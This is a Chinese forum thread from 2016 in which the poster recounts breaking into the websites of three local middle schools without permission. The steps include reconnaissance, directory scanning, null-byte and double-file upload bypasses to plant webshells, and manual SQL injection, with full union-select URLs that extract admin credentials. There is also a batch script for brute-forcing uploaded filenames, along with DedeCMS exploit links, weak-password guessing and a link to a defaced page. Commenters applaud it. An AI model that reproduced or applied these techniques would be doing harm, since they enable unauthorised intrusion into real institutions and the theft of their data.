本地3所中学被红了

三联仔 · 发表于 2016-7-1 01:44:31

友情heidiao本地3所中学

目标
XX中学（http://www.****.cn/） XXXX中学（http://www.****.com/） XXXXX中学（http://www.****.com/）

1)XXXX中学
图片2.png

【信息收集】
经过前期探测基本确定了网站的环境，
网站脚本语言:asp
搭建平台:IIS7.5
数据库:access
操作系统:windows2008

【Whois信息】
联系人：XXXX （经查询应该不是域名商，可用于社工）
邮箱：XXX@qq.com

【服务器信息】
Ip:113.10.186.XXX
TCP: [21, 80, 135, 445]
21 => [ftp]; Ver => 220 GZIDC FTP Server ready...

【扫目录】

收获：
http://www.****.com/admin/login.asp 后台（像某cms）
图片3.png

http://www.****.com/admin/menu.asp 500错误

http://www.****.com/admin/admin_upload.asp 500错误

http://www.****.com/admin/Databackup/ 数据库备份路径（可用于后期爆破）

http://www.****.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp FCK编辑器
图片4.png

我日有前辈（diaosi）来过可是这是iis7.5 他用的是iis6解析漏洞然并卵

因为是星外有防护机制 diaosi.asp 是有这个文件夹

但访问 http://wwx.****.com/xx/diaosi.asp/是出现404的

【上传突破】
图片6.png

星外的一种防护机制

这里我们尝试00截断

成功获取webshell

连接
图片8.png

文件夹是确实存在的（注：给某些还在往文件夹里寻找突破的人提个醒）

（完结）

2)xx市xx中学
图片11.png

【信息收集】
经过前期探测基本确定了网站的环境，
网站脚本语言:asp
搭建平台:IIS76
数据库:access
操作系统:windows2003

【Whois信息】
联系人：XXX（可用于社工）
邮箱  ：XXX@126.com

【服务器信息】
Ip:218.5.77.XXX
Nmap信息：
PORT    STATE SERVICE
21/tcp open    ftp
22/tcp open    ssh
80/tcp open    http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epma
1025/tcp  open    NFS-or-IIS
3369/tcp  open    satvid-dataln
4444/tcp  filtered krb524
6667/tcp  filtered irc
8080/tcp  open    http-proxy
9102/tcp  open    jetdirect
31337/tcp filtered Elite

访问8080端口
图片12.png

某主机商控制面板

翻看whois查询是

http://www.bizcn.com/ 此域名主机（可用于社工）

【扫目录】
（注：这是之前留的图网站太卡且容易超时所以不复现）

图片13.png

http://www.****.com/adminc/admin.asp 500错误

http://www.****.com/adminc/bottom.asp

只出现了一条蓝色边信息（程序开发：易虎网络科技）
图片14.png

http://www.****.com/adminc/Upload_Photo.asp
图片15.png

上传点这种上传点可以双文件突破

http://www.****.com/adminc/Admin_Database.asp 访问转到登陆页面

http://www.****.com/adminc/article.asp 访问转到登陆页面

http://www.****.com/adminc/menu.asp
图片16.png

需要验证cookies

http://www.****.com/adminc/download.asp 访问转到登陆页面
http://www.****.com/adminc/DataBackup/ 数据库备份路径（可用于爆破）
http://www.****.com/adminc/picture.asp 访问转到登陆页面
http://www.****.com/adminc/upload_Photo.asp?PhotoUrlID=3 上传点

【双文件上传突破】

图片17.png

传上去了可是没回显路径文件名啊。。

那么只有通过后台才能知道路径了

【注入】
Asp站多少存有注入
随手找一个页面
单引号报错存有注入
图片18.png

操起超级SQL注入工具

工具会测试每一个参数

到测试出注入类型为：盲注数据库库为：access 时开始超时了。。。后改为手注

图片20.png

注入点支持union联合查询的

Order by 18 正常 19错误存有18个字段

and exists (select * from admin) 存有admin表（网站太卡因为是复现所以直接说明）

http://www.****.com/ArticleDetails.asp?Navigation1=%3FNavigation2%3D&Navigation2=&Navigation=&id=136%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin 7个显错位

图片21.png

http://www.****.com/ArticleDetails.asp?Navigation1=%3FNavigation2%3D&Navigation2=&Navigation=&id=136%20and%201=2%20union%20select%201,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18%20from%20admin

图片22.png

账号：admin Md5解密：adminlb1988

前台已经给出后台地址

图片23.png

点击登陆时最惊险的一幕出现了

系统找不到指定的文件心中一万只草泥马

【猜测】
管理员删除了主页面这能防一般的黑阔
需要更新文章时再连接ftp上传页面然后就可以愉快的更新文章了。。。

【社工】
我们可以社工ftp账号密码
社工主机客服小白不才社工不出来这里就不截图
------------------------------------------------------------
因为是星外你旁站也未必能提权（技术不精），所以我采取以下方法
-------------------------------------------------------------
【爆破文件名】

图片24.png

http://www.****.com/UploadFiles/Picture/20091226110005430.jpg

据经验应该是这条路径

【分析】

20091226110005430
年：2009 月：12 日：26 时：11 分：00 秒：05 后面是随机数

为了增加成功率批量上传一句话

图片25.png

为了扩大可能性
从500000-800000
20091226110005430

图片26.png

运气成分很大
20160615180821762
有时候会消0 随机数不会消0
2016061518821762

【脚本】
批处理脚本：
@echo off
for /l %%i in (600000,1,900000) do (
for /l %%j in (1,1,1) do echo %%i>>txt.txt
)
pause

因为是复现网站容易超时很多地方不能提供截图
（完结）

3)XX中学
图片27.png

【信息收集】
经过前期探测基本确定了网站的环境，
网站脚本语言:php
搭建平台:IIS8.0
数据库类型:mysql
操作系统:windows2008

【Whois信息】
联系人：xx市XX中学（经查询应该不是域名商，可用于社工）
邮箱：XXXX@qq.com

【服务器信息】
IP：219.234.8.XX
TCP: [80]

【CMS探测】
Dedecms管理系统
图片28.png

版本是20150618

【漏洞利用】

百度了一下找到了1个适合这个版本的漏洞

Dedecms远程写文件漏洞和利用方法

传送门：http://tieba.baidu.com/p/3912629984

漏洞文件：

1:install/index.php.bak 403错误 iis8.0是不支持.bak文件显示的

得到物理路径：D:\wwwroot\m160314\wwwroot\install\index.php.bak

2:install/index.php 404错误

另一个漏洞需要注册会员但网站关闭了注册会员功能

传送门：http://www.wooyun.org/bugs/wooyun-2015-0127787

【社工】
后台地址未改
图片29.png

http://www.****.cn/dede/login.php?gotopage=%2Fdede%2F

各种弱口令

最后密码是XXXX

【webshell】

图片30.png

1.文件式管理器

2.直接上传php

图片31.png

旁站（qiqiechengqun）

（完结）

本以为有nv的微信什么的
失望。。。
失望。。。。
失望。。。。。

不信？？？打开看看？？？
↓
http://www.zcms.cn/uploads/index1.html

已经发邮件给注册的域名的管理员

我来这里发帖子是想让大家的安全意识都能提高（除了装X之外）
避免被盗取XXXX 你懂的

三联仔 · 发表于 2016-7-1 01:47:02

本帖最后由三联仔于 2016-7-1 01:48 编辑

像这种帖子管理貌似不删吧

如果有哪里侵犯了什么请站内联系我

秋风起 · 发表于 2016-7-1 01:53:48

那三家中学要请你去做安全顾问了

三联仔 · 发表于 2016-7-1 02:01:25

秋风起发表于 2016-7-1 01:53
那三家中学要请你去做安全顾问了

是学校的安全不到位

三联仔 · 发表于 2016-7-1 02:03:37

我来这里发帖子是想让大家的安全意识都能提高避免被盗取XXX
你懂的

发表于 2016-7-1 18:44:41

[s:122]

请叫我小贱 · 发表于 2016-7-2 18:09:54

[s:68]只有大型网站才做防黑的

三联仔 · 发表于 2016-7-3 19:34:00

请叫我小贱发表于 2016-7-2 18:09
只有大型网站才做防黑的

[s:85]大型网站都给日烂了你信不

云山枝头 · 发表于 2016-7-3 20:20:00

看来，楼主有一定的黑客素养啊。[s:81]

鬼魅 · 发表于 2016-7-4 00:51:19

估计都是一间公司做出来的网站

本地3所中学被红了

发表回复

楼主

热门推荐